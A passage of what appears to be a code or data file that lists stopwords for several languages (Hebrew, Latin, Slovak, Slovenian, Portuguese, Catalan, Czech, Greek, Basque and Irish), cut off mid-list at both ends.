\"על\",\n        \"עלי\",\n        \"עליה\",\n        \"עליהם\",\n        \"עליהן\",\n        \"עליו\",\n        \"עליך\",\n        \"עליכם\",\n        \"עלינו\",\n        \"עם\",\n        \"עצמה\",\n        \"עצמהם\",\n        \"עצמהן\",\n        \"עצמו\",\n        \"עצמי\",\n        \"עצמם\",\n        \"עצמן\",\n        \"עצמנו\",\n        \"פה\",\n        \"רק\",\n        \"שוב\",\n        \"של\",\n        \"שלה\",\n        \"שלהם\",\n        \"שלהן\",\n        \"שלו\",\n        \"שלי\",\n        \"שלך\",\n        \"שלכה\",\n        \"שלכם\",\n        \"שלכן\",\n        \"שלנו\",\n        \"שם\",\n        \"תהיה\",\n        \"תחת\",\n    ],\n    \"la\": [\n        \"a\",\n        \"ab\",\n        \"ac\",\n        \"ad\",\n        \"at\",\n        \"atque\",\n        \"aut\",\n        \"autem\",\n        \"cum\",\n        \"de\",\n        \"dum\",\n        \"e\",\n        \"erant\",\n        \"erat\",\n        \"est\",\n        \"et\",\n        \"etiam\",\n        \"ex\",\n        \"haec\",\n        \"hic\",\n        \"hoc\",\n        \"in\",\n        \"ita\",\n        \"me\",\n        \"nec\",\n        \"neque\",\n        \"non\",\n        \"per\",\n        \"qua\",\n        \"quae\",\n        \"quam\",\n        \"qui\",\n        \"quibus\",\n        \"quidem\",\n        \"quo\",\n        \"quod\",\n        \"re\",\n        \"rebus\",\n        \"rem\",\n        \"res\",\n        \"sed\",\n        \"si\",\n        \"sic\",\n        \"sunt\",\n        \"tamen\",\n        \"tandem\",\n        \"te\",\n        \"ut\",\n        \"vel\",\n    ],\n    \"sk\": [\n        \"a\",\n        \"aby\",\n        \"aj\",\n        \"ako\",\n        \"aký\",\n        \"ale\",\n        \"alebo\",\n        \"ani\",\n        \"avšak\",\n        \"ba\",\n        \"bez\",\n        \"buï\",\n        \"cez\",\n        \"do\",\n        \"ho\",\n        \"hoci\",\n        \"i\",\n        \"ich\",\n        \"im\",\n        \"ja\",\n        \"jeho\",\n        \"jej\",\n        \"jemu\",\n        \"ju\",\n        \"k\",\n        \"kam\",\n        \"kde\",\n        \"kedže\",\n        \"keï\",\n        \"kto\",\n        \"ktorý\",\n        \"ku\",\n        \"lebo\",\n        \"ma\",\n        \"mi\",\n        \"mne\",\n        \"mnou\",\n        \"mu\",\n        \"my\",\n        \"mòa\",\n        \"môj\",\n        \"na\",\n        \"nad\",\n        \"nami\",\n        \"neho\",\n        \"nej\",\n        \"nemu\",\n        \"nich\",\n        \"nielen\",\n        \"nim\",\n        \"no\",\n        \"nám\",\n        \"nás\",\n        \"náš\",\n        \"ním\",\n        \"o\",\n        \"od\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ony\",\n        \"po\",\n        \"pod\",\n        \"pre\",\n        \"pred\",\n        \"pri\",\n        \"s\",\n        \"sa\",\n        \"seba\",\n        \"sem\",\n        \"so\",\n        \"svoj\",\n        \"taký\",\n        \"tam\",\n        \"teba\",\n        \"tebe\",\n        \"tebou\",\n        \"tej\",\n        \"ten\",\n        \"ti\",\n        \"tie\",\n        \"to\",\n        \"toho\",\n        \"tomu\",\n        \"tou\",\n        \"tvoj\",\n        \"ty\",\n        \"tá\",\n        \"tým\",\n        \"v\",\n        \"vami\",\n        \"veï\",\n        \"vo\",\n        \"vy\",\n        \"vám\",\n        \"vás\",\n        \"váš\",\n        \"však\",\n        \"z\",\n        \"za\",\n        \"zo\",\n        \"a\",\n        \"èi\",\n        \"èo\",\n        \"èí\",\n        \"òom\",\n        \"òou\",\n        \"òu\",\n        \"že\",\n    ],\n    \"sl\": [\n        \"a\",\n        \"ali\",\n        \"april\",\n        \"avgust\",\n        \"b\",\n        \"bi\",\n        \"bil\",\n        \"bila\",\n        \"bile\",\n        \"bili\",\n        \"bilo\",\n        \"biti\",\n        \"blizu\",\n        \"bo\",\n        \"bodo\",\n        \"bojo\",\n        \"bolj\",\n        \"bom\",\n        \"bomo\",\n        \"boste\",\n        \"bova\",\n        \"boš\",\n        \"brez\",\n        \"c\",\n        \"cel\",\n        \"cela\",\n        \"celi\",\n        \"celo\",\n        \"d\",\n        \"da\",\n        \"daleč\",\n        \"dan\",\n        \"danes\",\n        \"datum\",\n        \"december\",\n        \"deset\",\n        \"deseta\",\n        \"deseti\",\n        \"deseto\",\n        \"devet\",\n        \"deveta\",\n        \"deveti\",\n        \"deveto\",\n        \"do\",\n        \"dober\",\n        \"dobra\",\n        \"dobri\",\n        \"dobro\",\n        \"dokler\",\n        \"dol\",\n        \"dolg\",\n        \"dolga\",\n        \"dolgi\",\n        \"dovolj\",\n        \"drug\",\n        \"druga\",\n        \"drugi\",\n        \"drugo\",\n        \"dva\",\n        \"dve\",\n        \"e\",\n        \"eden\",\n        \"en\",\n        \"ena\",\n        \"ene\",\n        \"eni\",\n        \"enkrat\",\n        \"eno\",\n        \"etc.\",\n        \"f\",\n        \"februar\",\n        \"g\",\n        \"g.\",\n        \"ga\",\n        \"ga.\",\n        \"gor\",\n        \"gospa\",\n        \"gospod\",\n        \"h\",\n        \"halo\",\n        \"i\",\n        \"idr.\",\n        \"ii\",\n        \"iii\",\n        \"in\",\n        \"iv\",\n        \"ix\",\n        \"iz\",\n        \"j\",\n        \"januar\",\n        \"jaz\",\n        \"je\",\n        \"ji\",\n        \"jih\",\n        \"jim\",\n        \"jo\",\n        \"julij\",\n        \"junij\",\n        \"jutri\",\n        \"k\",\n        \"kadarkoli\",\n        \"kaj\",\n        \"kajti\",\n        \"kako\",\n        \"kakor\",\n        \"kamor\",\n        \"kamorkoli\",\n        \"kar\",\n        \"karkoli\",\n        \"katerikoli\",\n        \"kdaj\",\n        \"kdo\",\n        \"kdorkoli\",\n        \"ker\",\n        \"ki\",\n        \"kje\",\n        \"kjer\",\n        \"kjerkoli\",\n        \"ko\",\n        \"koder\",\n        \"koderkoli\",\n        \"koga\",\n        \"komu\",\n        \"kot\",\n        \"kratek\",\n        \"kratka\",\n        \"kratke\",\n        \"kratki\",\n        \"l\",\n        \"lahka\",\n        \"lahke\",\n        \"lahki\",\n        \"lahko\",\n        \"le\",\n        \"lep\",\n        \"lepa\",\n        \"lepe\",\n        \"lepi\",\n        \"lepo\",\n        \"leto\",\n        \"m\",\n        \"maj\",\n        \"majhen\",\n        \"majhna\",\n        \"majhni\",\n        \"malce\",\n        \"malo\",\n        \"manj\",\n        \"marec\",\n        \"me\",\n        \"med\",\n        \"medtem\",\n        \"mene\",\n        \"mesec\",\n        \"mi\",\n        \"midva\",\n        \"midve\",\n        \"mnogo\",\n        \"moj\",\n        \"moja\",\n        \"moje\",\n        \"mora\",\n        \"morajo\",\n        \"moram\",\n        \"moramo\",\n        \"morate\",\n        \"moraš\",\n        \"morem\",\n        \"mu\",\n        \"n\",\n        \"na\",\n        \"nad\",\n        \"naj\",\n        \"najina\",\n        \"najino\",\n        \"najmanj\",\n        \"naju\",\n        \"največ\",\n        \"nam\",\n        \"narobe\",\n        \"nas\",\n        \"nato\",\n        \"nazaj\",\n        \"naš\",\n        \"naša\",\n        \"naše\",\n        \"ne\",\n        \"nedavno\",\n        \"nedelja\",\n        \"nek\",\n        \"neka\",\n        \"nekaj\",\n        \"nekatere\",\n        \"nekateri\",\n        \"nekatero\",\n        \"nekdo\",\n        \"neke\",\n        \"nekega\",\n        \"neki\",\n        \"nekje\",\n        \"neko\",\n        \"nekoga\",\n        \"nekoč\",\n        \"ni\",\n        \"nikamor\",\n        \"nikdar\",\n        \"nikjer\",\n        \"nikoli\",\n        \"nič\",\n        \"nje\",\n        \"njega\",\n        \"njegov\",\n        \"njegova\",\n        \"njegovo\",\n        \"njej\",\n        \"njemu\",\n        \"njen\",\n        \"njena\",\n        \"njeno\",\n        \"nji\",\n        \"njih\",\n        \"njihov\",\n        \"njihova\",\n        \"njihovo\",\n        \"njiju\",\n        \"njim\",\n        \"njo\",\n        \"njun\",\n        \"njuna\",\n        \"njuno\",\n        \"no\",\n        \"nocoj\",\n        \"november\",\n        \"npr.\",\n        \"o\",\n        \"ob\",\n        \"oba\",\n        \"obe\",\n        \"oboje\",\n        \"od\",\n        \"odprt\",\n        \"odprta\",\n        \"odprti\",\n        \"okoli\",\n        \"oktober\",\n        \"on\",\n        \"onadva\",\n        \"one\",\n        \"oni\",\n        \"onidve\",\n        \"osem\",\n        \"osma\",\n        \"osmi\",\n        \"osmo\",\n        \"oz.\",\n        \"p\",\n        \"pa\",\n        \"pet\",\n        \"peta\",\n        \"petek\",\n        \"peti\",\n        \"peto\",\n        \"po\",\n        \"pod\",\n        \"pogosto\",\n        \"poleg\",\n        \"poln\",\n        \"polna\",\n        \"polni\",\n        \"polno\",\n        \"ponavadi\",\n        \"ponedeljek\",\n        \"ponovno\",\n        \"potem\",\n        \"povsod\",\n        \"pozdravljen\",\n        \"pozdravljeni\",\n        \"prav\",\n        \"prava\",\n        \"prave\",\n        \"pravi\",\n        \"pravo\",\n        \"prazen\",\n        \"prazna\",\n        \"prazno\",\n        \"prbl.\",\n        \"precej\",\n        \"pred\",\n        \"prej\",\n        \"preko\",\n        \"pri\",\n        \"pribl.\",\n        \"približno\",\n        \"primer\",\n        \"pripravljen\",\n        \"pripravljena\",\n        \"pripravljeni\",\n        \"proti\",\n        \"prva\",\n        \"prvi\",\n        \"prvo\",\n        \"r\",\n        \"ravno\",\n        \"redko\",\n        \"res\",\n        \"reč\",\n        \"s\",\n        \"saj\",\n        \"sam\",\n        \"sama\",\n        \"same\",\n        \"sami\",\n        \"samo\",\n        \"se\",\n        \"sebe\",\n        \"sebi\",\n        \"sedaj\",\n        \"sedem\",\n        \"sedma\",\n        \"sedmi\",\n        \"sedmo\",\n        \"sem\",\n        \"september\",\n        \"seveda\",\n        \"si\",\n        \"sicer\",\n        \"skoraj\",\n        \"skozi\",\n        \"slab\",\n        \"smo\",\n        \"so\",\n        \"sobota\",\n        \"spet\",\n        \"sreda\",\n        \"srednja\",\n        \"srednji\",\n        \"sta\",\n        \"ste\",\n        \"stran\",\n        \"stvar\",\n        \"sva\",\n        \"t\",\n        \"ta\",\n        \"tak\",\n        \"taka\",\n        \"take\",\n        \"taki\",\n        \"tako\",\n        \"takoj\",\n        \"tam\",\n        \"te\",\n        \"tebe\",\n        \"tebi\",\n        \"tega\",\n        \"težak\",\n        \"težka\",\n        \"težki\",\n        \"težko\",\n        \"ti\",\n        \"tista\",\n        \"tiste\",\n        \"tisti\",\n        \"tisto\",\n        \"tj.\",\n        \"tja\",\n        \"to\",\n        \"toda\",\n        \"torek\",\n        \"tretja\",\n        \"tretje\",\n        \"tretji\",\n        \"tri\",\n        \"tu\",\n        \"tudi\",\n        \"tukaj\",\n        \"tvoj\",\n        \"tvoja\",\n        \"tvoje\",\n        \"u\",\n        \"v\",\n        \"vaju\",\n        \"vam\",\n        \"vas\",\n        \"vaš\",\n        \"vaša\",\n        \"vaše\",\n        \"ve\",\n        \"vedno\",\n        \"velik\",\n        \"velika\",\n        \"veliki\",\n        \"veliko\",\n        \"vendar\",\n        \"ves\",\n        \"več\",\n        \"vi\",\n        \"vidva\",\n        \"vii\",\n        \"viii\",\n        \"visok\",\n        \"visoka\",\n        \"visoke\",\n        \"visoki\",\n        \"vsa\",\n        \"vsaj\",\n        \"vsak\",\n        \"vsaka\",\n        \"vsakdo\",\n        \"vsake\",\n        \"vsaki\",\n        \"vsakomur\",\n        \"vse\",\n        \"vsega\",\n        \"vsi\",\n        \"vso\",\n        \"včasih\",\n        \"včeraj\",\n        \"x\",\n        \"z\",\n        \"za\",\n        \"zadaj\",\n        \"zadnji\",\n        \"zakaj\",\n        \"zaprta\",\n        \"zaprti\",\n        \"zaprto\",\n        \"zdaj\",\n        \"zelo\",\n        \"zunaj\",\n        \"č\",\n        \"če\",\n        \"često\",\n        \"četrta\",\n        \"četrtek\",\n        \"četrti\",\n        \"četrto\",\n        \"čez\",\n        \"čigav\",\n        \"š\",\n        \"šest\",\n        \"šesta\",\n        \"šesti\",\n        \"šesto\",\n        \"štiri\",\n        \"ž\",\n        \"že\",\n    ],\n    \"br\": [\n        \"a\",\n        \"ainda\",\n        \"alem\",\n        \"ambas\",\n        \"ambos\",\n        \"antes\",\n        \"ao\",\n        \"aonde\",\n        \"aos\",\n        \"apos\",\n        \"aquele\",\n        \"aqueles\",\n        \"as\",\n        \"assim\",\n        \"com\",\n        \"como\",\n        \"contra\",\n        \"contudo\",\n        \"cuja\",\n        \"cujas\",\n        \"cujo\",\n        \"cujos\",\n        \"da\",\n        \"das\",\n        \"de\",\n        \"dela\",\n        \"dele\",\n        \"deles\",\n        \"demais\",\n        \"depois\",\n        \"desde\",\n        \"desta\",\n        \"deste\",\n        \"dispoe\",\n        \"dispoem\",\n        \"diversa\",\n        \"diversas\",\n        \"diversos\",\n        \"do\",\n        \"dos\",\n        \"durante\",\n        \"e\",\n        \"ela\",\n        \"elas\",\n        \"ele\",\n        \"eles\",\n        \"em\",\n        \"entao\",\n        \"entre\",\n        \"essa\",\n        \"essas\",\n        \"esse\",\n        \"esses\",\n        \"esta\",\n        \"estas\",\n        \"este\",\n        \"estes\",\n        \"ha\",\n        \"isso\",\n        \"isto\",\n        \"logo\",\n        \"mais\",\n        \"mas\",\n        \"mediante\",\n        \"menos\",\n        \"mesma\",\n        \"mesmas\",\n        \"mesmo\",\n        \"mesmos\",\n        \"na\",\n        \"nao\",\n        \"nas\",\n        \"nem\",\n        \"nesse\",\n        \"neste\",\n        \"nos\",\n        \"o\",\n        \"os\",\n        \"ou\",\n        \"outra\",\n        \"outras\",\n        \"outro\",\n        \"outros\",\n        \"pelas\",\n        \"pelo\",\n        \"pelos\",\n        \"perante\",\n        \"pois\",\n        \"por\",\n        \"porque\",\n        \"portanto\",\n        \"propios\",\n        \"proprio\",\n        \"quais\",\n        \"qual\",\n        \"qualquer\",\n        \"quando\",\n        \"quanto\",\n        \"que\",\n        \"quem\",\n        \"quer\",\n        \"se\",\n        \"seja\",\n        \"sem\",\n        \"sendo\",\n        \"seu\",\n        \"seus\",\n        \"sob\",\n        \"sobre\",\n        \"sua\",\n        \"suas\",\n        \"tal\",\n        \"tambem\",\n        \"teu\",\n        \"teus\",\n        \"toda\",\n        \"todas\",\n        \"todo\",\n        \"todos\",\n        \"tua\",\n        \"tuas\",\n        \"tudo\",\n        \"um\",\n        \"uma\",\n        \"umas\",\n        \"uns\",\n    ],\n    \"ca\": [\n        \"a\",\n        \"abans\",\n        \"ací\",\n        \"ah\",\n        \"així\",\n        \"això\",\n        \"al\",\n        \"aleshores\",\n        \"algun\",\n        \"alguna\",\n        \"algunes\",\n        \"alguns\",\n        \"alhora\",\n        \"allà\",\n        \"allí\",\n        \"allò\",\n        \"als\",\n        \"altra\",\n        \"altre\",\n        \"altres\",\n        \"amb\",\n        \"ambdues\",\n        \"ambdós\",\n        \"apa\",\n        \"aquell\",\n        \"aquella\",\n        \"aquelles\",\n        \"aquells\",\n        \"aquest\",\n        \"aquesta\",\n        \"aquestes\",\n        \"aquests\",\n        \"aquí\",\n        \"baix\",\n        \"cada\",\n        \"cadascuna\",\n        \"cadascunes\",\n        \"cadascuns\",\n        \"cadascú\",\n        \"com\",\n        \"contra\",\n        \"d'un\",\n        \"d'una\",\n        \"d'unes\",\n        \"d'uns\",\n        \"dalt\",\n        \"de\",\n        \"del\",\n        \"dels\",\n        \"des\",\n        \"després\",\n        \"dins\",\n        \"dintre\",\n        \"donat\",\n        \"doncs\",\n        \"durant\",\n        \"e\",\n        \"eh\",\n        \"el\",\n        \"els\",\n        \"em\",\n        \"en\",\n        \"encara\",\n        \"ens\",\n        \"entre\",\n        \"eren\",\n        \"es\",\n        \"esta\",\n        \"estaven\",\n        \"esteu\",\n        \"està\",\n        \"estàvem\",\n        \"estàveu\",\n        \"et\",\n        \"etc\",\n        \"ets\",\n        \"fins\",\n        \"fora\",\n        \"gairebé\",\n        \"ha\",\n        \"han\",\n        \"has\",\n        \"havia\",\n        \"he\",\n        \"hem\",\n        \"heu\",\n        \"hi\",\n        \"ho\",\n        \"i\",\n        \"igual\",\n        \"iguals\",\n        \"ja\",\n        \"l'hi\",\n        \"la\",\n        \"les\",\n        \"li\",\n        \"li'n\",\n        \"llavors\",\n        \"m'he\",\n        \"ma\",\n        \"mal\",\n        \"malgrat\",\n        \"mateix\",\n        \"mateixa\",\n        \"mateixes\",\n        \"mateixos\",\n        \"me\",\n        \"mentre\",\n        \"meu\",\n        \"meus\",\n        \"meva\",\n        \"meves\",\n        \"molt\",\n        \"molta\",\n        \"moltes\",\n        \"molts\",\n        \"mon\",\n        \"mons\",\n        \"més\",\n        \"n'he\",\n        \"n'hi\",\n        \"ne\",\n        \"ni\",\n        \"no\",\n        \"nogensmenys\",\n        \"només\",\n        \"nosaltres\",\n        \"nostra\",\n        \"nostre\",\n        \"nostres\",\n        \"o\",\n        \"oh\",\n        \"oi\",\n        \"on\",\n        \"pas\",\n        \"pel\",\n        \"pels\",\n        \"per\",\n        \"perquè\",\n        \"però\",\n        \"poc\",\n        \"poca\",\n        \"pocs\",\n        \"poques\",\n        \"potser\",\n        \"propi\",\n        \"qual\",\n        \"quals\",\n        \"quan\",\n        \"quant\",\n        \"que\",\n        \"quelcom\",\n        \"qui\",\n        \"quin\",\n        \"quina\",\n        \"quines\",\n        \"quins\",\n        \"què\",\n        \"s'ha\",\n        \"s'han\",\n        \"sa\",\n        \"semblant\",\n        \"semblants\",\n        \"ses\",\n        \"seu\",\n        \"seus\",\n        \"seva\",\n        \"seves\",\n        \"si\",\n        \"sobre\",\n        \"sobretot\",\n        \"solament\",\n        \"sols\",\n        \"son\",\n        \"sons\",\n        \"sota\",\n        \"sou\",\n        \"sóc\",\n        \"són\",\n        \"t'ha\",\n        \"t'han\",\n        \"t'he\",\n        \"ta\",\n        \"tal\",\n        \"també\",\n        \"tampoc\",\n        \"tan\",\n        \"tant\",\n        \"tanta\",\n        \"tantes\",\n        \"teu\",\n        \"teus\",\n        \"teva\",\n        \"teves\",\n        \"ton\",\n        \"tons\",\n        \"tot\",\n        \"tota\",\n        \"totes\",\n        \"tots\",\n        \"un\",\n        \"una\",\n        \"unes\",\n        \"uns\",\n        \"us\",\n        \"va\",\n        \"vaig\",\n        \"vam\",\n        \"van\",\n        \"vas\",\n        \"veu\",\n        \"vosaltres\",\n        \"vostra\",\n        \"vostre\",\n        \"vostres\",\n        \"érem\",\n        \"éreu\",\n        \"és\",\n    ],\n    \"cs\": [\n        \"a\",\n        \"aby\",\n        \"ahoj\",\n        \"aj\",\n        \"ale\",\n        \"anebo\",\n        \"ani\",\n        \"ano\",\n        \"asi\",\n        \"aspoň\",\n        \"atd\",\n        \"atp\",\n        \"ačkoli\",\n        \"až\",\n        \"bez\",\n        \"beze\",\n        \"blízko\",\n        \"bohužel\",\n        \"brzo\",\n        \"bude\",\n        \"budem\",\n        \"budeme\",\n        \"budete\",\n        \"budeš\",\n        \"budou\",\n        \"budu\",\n        \"by\",\n        \"byl\",\n        \"byla\",\n        \"byli\",\n        \"bylo\",\n        \"byly\",\n        \"bys\",\n        \"být\",\n        \"během\",\n        \"chce\",\n        \"chceme\",\n        \"chcete\",\n        \"chceš\",\n        \"chci\",\n        \"chtít\",\n        \"chtějí\",\n        \"chut'\",\n        \"chuti\",\n        \"co\",\n        \"což\",\n        \"cz\",\n        \"daleko\",\n        \"další\",\n        \"den\",\n        \"deset\",\n        \"devatenáct\",\n        \"devět\",\n        \"dnes\",\n        \"do\",\n        \"dobrý\",\n        \"docela\",\n        \"dva\",\n        \"dvacet\",\n        \"dvanáct\",\n        \"dvě\",\n        \"dál\",\n        \"dále\",\n        \"děkovat\",\n        \"děkujeme\",\n        \"děkuji\",\n        \"ho\",\n        \"hodně\",\n        \"i\",\n        \"jak\",\n        \"jakmile\",\n        \"jako\",\n        \"jakož\",\n        \"jde\",\n        \"je\",\n        \"jeden\",\n        \"jedenáct\",\n        \"jedna\",\n        \"jedno\",\n        \"jednou\",\n        \"jedou\",\n        \"jeho\",\n        \"jehož\",\n        \"jej\",\n        \"jejich\",\n        \"její\",\n        \"jelikož\",\n        \"jemu\",\n        \"jen\",\n        \"jenom\",\n        \"jestli\",\n        \"jestliže\",\n        \"ještě\",\n        \"jež\",\n        \"ji\",\n        \"jich\",\n        \"jimi\",\n        \"jinak\",\n        \"jiné\",\n        \"již\",\n        \"jsem\",\n        \"jseš\",\n        \"jsi\",\n        \"jsme\",\n        \"jsou\",\n        \"jste\",\n        \"já\",\n        \"jí\",\n        \"jím\",\n        \"jíž\",\n        \"k\",\n        \"kam\",\n        \"kde\",\n        \"kdo\",\n        \"kdy\",\n        \"když\",\n        \"ke\",\n        \"kolik\",\n        \"kromě\",\n        \"kterou\",\n        \"která\",\n        \"které\",\n        \"který\",\n        \"kteří\",\n        \"kvůli\",\n        \"mají\",\n        \"mezi\",\n        \"mi\",\n        \"mne\",\n        \"mnou\",\n        \"mně\",\n        \"moc\",\n        \"mohl\",\n        \"mohou\",\n        \"moje\",\n        \"moji\",\n        \"možná\",\n        \"musí\",\n        \"my\",\n        \"má\",\n        \"málo\",\n        \"mám\",\n        \"máme\",\n        \"máte\",\n        \"máš\",\n        \"mé\",\n        \"mí\",\n        \"mít\",\n        \"mě\",\n        \"můj\",\n        \"může\",\n        \"na\",\n        \"nad\",\n        \"nade\",\n        \"napište\",\n        \"naproti\",\n        \"načež\",\n        \"naše\",\n        \"naši\",\n        \"ne\",\n        \"nebo\",\n        \"nebyl\",\n        \"nebyla\",\n        \"nebyli\",\n        \"nebyly\",\n        \"nedělají\",\n        \"nedělá\",\n        \"nedělám\",\n        \"neděláme\",\n        \"neděláte\",\n        \"neděláš\",\n        \"neg\",\n        \"nejsi\",\n        \"nejsou\",\n        \"nemají\",\n        \"nemáme\",\n        \"nemáte\",\n        \"neměl\",\n        \"není\",\n        \"nestačí\",\n        \"nevadí\",\n        \"než\",\n        \"nic\",\n        \"nich\",\n        \"nimi\",\n        \"nové\",\n        \"nový\",\n        \"nula\",\n        \"nám\",\n        \"námi\",\n        \"nás\",\n        \"náš\",\n        \"ním\",\n        \"ně\",\n        \"něco\",\n        \"nějak\",\n        \"někde\",\n        \"někdo\",\n        \"němu\",\n        \"němuž\",\n        \"o\",\n        \"od\",\n        \"ode\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ony\",\n        \"osm\",\n        \"osmnáct\",\n        \"pak\",\n        \"patnáct\",\n        \"po\",\n        \"pod\",\n        \"podle\",\n        \"pokud\",\n        \"potom\",\n        \"pouze\",\n        \"pozdě\",\n        \"pořád\",\n        \"pravé\",\n        \"pro\",\n        \"prostě\",\n        \"prosím\",\n        \"proti\",\n        \"proto\",\n        \"protože\",\n        \"proč\",\n        \"první\",\n        \"pta\",\n        \"pět\",\n        \"před\",\n        \"přes\",\n        \"přese\",\n        \"při\",\n        \"přičemž\",\n        \"re\",\n        \"rovně\",\n        \"s\",\n        \"se\",\n        \"sedm\",\n        \"sedmnáct\",\n        \"si\",\n        \"skoro\",\n        \"smí\",\n        \"smějí\",\n        \"snad\",\n        \"spolu\",\n        \"sta\",\n        \"sto\",\n        \"strana\",\n        \"sté\",\n        \"své\",\n        \"svých\",\n        \"svým\",\n        \"svými\",\n        \"ta\",\n        \"tady\",\n        \"tak\",\n        \"takhle\",\n        \"taky\",\n        \"také\",\n        \"takže\",\n        \"tam\",\n        \"tamhle\",\n        \"tamhleto\",\n        \"tamto\",\n        \"tato\",\n        \"tebe\",\n        \"tebou\",\n        \"ted'\",\n        \"tedy\",\n        \"ten\",\n        \"tento\",\n        \"teto\",\n        \"ti\",\n        \"tipy\",\n        \"tisíc\",\n        \"tisíce\",\n        \"to\",\n        \"tobě\",\n        \"tohle\",\n        \"toho\",\n        \"tohoto\",\n        \"tom\",\n        \"tomto\",\n        \"tomu\",\n        \"tomuto\",\n        \"toto\",\n        \"trošku\",\n        \"tu\",\n        \"tuto\",\n        \"tvoje\",\n        \"tvá\",\n        \"tvé\",\n        \"tvůj\",\n        \"ty\",\n        \"tyto\",\n        \"téma\",\n        \"tím\",\n        \"tímto\",\n        \"tě\",\n        \"těm\",\n        \"těmu\",\n        \"třeba\",\n        \"tři\",\n        \"třináct\",\n        \"u\",\n        \"určitě\",\n        \"už\",\n        \"v\",\n        \"vaše\",\n        \"vaši\",\n        \"ve\",\n        \"vedle\",\n        \"večer\",\n        \"vlastně\",\n        \"vy\",\n        \"vám\",\n        \"vámi\",\n        \"vás\",\n        \"váš\",\n        \"více\",\n        \"však\",\n        \"všechno\",\n        \"všichni\",\n        \"vůbec\",\n        \"vždy\",\n        \"z\",\n        \"za\",\n        \"zatímco\",\n        \"zač\",\n        \"zda\",\n        \"zde\",\n        \"ze\",\n        \"zprávy\",\n        \"zpět\",\n        \"čau\",\n        \"či\",\n        \"článku\",\n        \"články\",\n        \"čtrnáct\",\n        \"čtyři\",\n        \"šest\",\n        \"šestnáct\",\n        \"že\",\n    ],\n    \"el\": [\n        \"αλλα\",\n        \"αν\",\n        \"αντι\",\n        \"απο\",\n        \"αυτα\",\n        \"αυτεσ\",\n        \"αυτη\",\n        \"αυτο\",\n        \"αυτοι\",\n        \"αυτοσ\",\n        \"αυτουσ\",\n        \"αυτων\",\n        \"για\",\n        \"δε\",\n        \"δεν\",\n        \"εαν\",\n        \"ειμαι\",\n        \"ειμαστε\",\n        \"ειναι\",\n        \"εισαι\",\n        \"ειστε\",\n        \"εκεινα\",\n        \"εκεινεσ\",\n        \"εκεινη\",\n        \"εκεινο\",\n        \"εκεινοι\",\n        \"εκεινοσ\",\n        \"εκεινουσ\",\n        \"εκεινων\",\n        \"ενω\",\n        \"επι\",\n        \"η\",\n        \"θα\",\n        \"ισωσ\",\n        \"κ\",\n        \"και\",\n        \"κατα\",\n        \"κι\",\n        \"μα\",\n        \"με\",\n        \"μετα\",\n        \"μη\",\n        \"μην\",\n        \"να\",\n        \"ο\",\n        \"οι\",\n        \"ομωσ\",\n        \"οπωσ\",\n        \"οσο\",\n        \"οτι\",\n        \"παρα\",\n        \"ποια\",\n        \"ποιεσ\",\n        \"ποιο\",\n        \"ποιοι\",\n        \"ποιοσ\",\n        \"ποιουσ\",\n        \"ποιων\",\n        \"που\",\n        \"προσ\",\n        \"πωσ\",\n        \"σε\",\n        \"στη\",\n        \"στην\",\n        \"στο\",\n        \"στον\",\n        \"τα\",\n        \"την\",\n        \"τησ\",\n        \"το\",\n        \"τον\",\n        \"τοτε\",\n        \"του\",\n        \"των\",\n        \"ωσ\",\n    ],\n    \"eu\": [\n        \"al\",\n        \"anitz\",\n        \"arabera\",\n        \"asko\",\n        \"baina\",\n        \"bat\",\n        \"batean\",\n        \"batek\",\n        \"bati\",\n        \"batzuei\",\n        \"batzuek\",\n        \"batzuetan\",\n        \"batzuk\",\n        \"bera\",\n        \"beraiek\",\n        \"berau\",\n        \"berauek\",\n        \"bere\",\n        \"berori\",\n        \"beroriek\",\n        \"beste\",\n        \"bezala\",\n        \"da\",\n        \"dago\",\n        \"dira\",\n        \"ditu\",\n        \"du\",\n        \"dute\",\n        \"edo\",\n        \"egin\",\n        \"ere\",\n        \"eta\",\n        \"eurak\",\n        \"ez\",\n        \"gainera\",\n        \"gu\",\n        \"gutxi\",\n        \"guzti\",\n        \"haiei\",\n        \"haiek\",\n        \"haietan\",\n        \"hainbeste\",\n        \"hala\",\n        \"han\",\n        \"handik\",\n        \"hango\",\n        \"hara\",\n        \"hari\",\n        \"hark\",\n        \"hartan\",\n        \"hau\",\n        \"hauei\",\n        \"hauek\",\n        \"hauetan\",\n        \"hemen\",\n        \"hemendik\",\n        \"hemengo\",\n        \"hi\",\n        \"hona\",\n        \"honek\",\n        \"honela\",\n        \"honetan\",\n        \"honi\",\n        \"hor\",\n        \"hori\",\n        \"horiei\",\n        \"horiek\",\n        \"horietan\",\n        \"horko\",\n        \"horra\",\n        \"horrek\",\n        \"horrela\",\n        \"horretan\",\n        \"horri\",\n        \"hortik\",\n        \"hura\",\n        \"izan\",\n        \"ni\",\n        \"noiz\",\n        \"nola\",\n        \"non\",\n        \"nondik\",\n        \"nongo\",\n        \"nor\",\n        \"nora\",\n        \"ze\",\n        \"zein\",\n        \"zen\",\n        \"zenbait\",\n        \"zenbat\",\n        \"zer\",\n        \"zergatik\",\n        \"ziren\",\n        \"zituen\",\n        \"zu\",\n        \"zuek\",\n        \"zuen\",\n        \"zuten\",\n    ],\n    \"ga\": [\n        \"a\",\n        \"ach\",\n        \"ag\",\n        \"agus\",\n        \"an\",\n        \"aon\",\n        \"ar\",\n        \"arna\",\n        \"as\",\n        \"b'\",\n        \"ba\",\n        \"beirt\",\n        \"bhúr\",\n        \"caoga\",\n        \"ceathair\",\n        \"ceathrar\",\n        \"chomh\",\n        \"chtó\",\n        \"chuig\",\n        \"chun\",\n        \"cois\",\n        \"céad\",\n        \"cúig\",\n        \"cúigear\",\n        \"d'\",\n        \"daichead\",\n        \"dar\",\n        \"de\",\n        \"deich\",\n        \"deichniúr\",\n        \"den\",\n        \"dhá\",\n        \"do\",\n        \"don\",\n        \"dtí\",\n        \"dá\",\n        \"dár\",\n        \"dó\",\n        \"faoi\",\n        \"faoin\",\n        \"faoina\",\n        \"faoinár\",\n        \"fara\",\n        \"fiche\",\n        \"gach\",\n        \"gan\",\n        \"go\",\n        \"gur\",\n        \"haon\",\n        \"hocht\",\n        \"i\",\n        \"iad\",\n        \"idir\",\n        \"in\",\n        \"ina\",\n        \"ins\",\n        \"inár\",\n        \"is\",\n        \"le\",\n        \"leis\",\n        \"lena\",\n        \"lenár\",\n        \"m'\",\n        \"mar\",\n        \"mo\",\n        \"mé\",\n        \"na\",\n        \"nach\",\n        \"naoi\",\n        \"naonúr\",\n        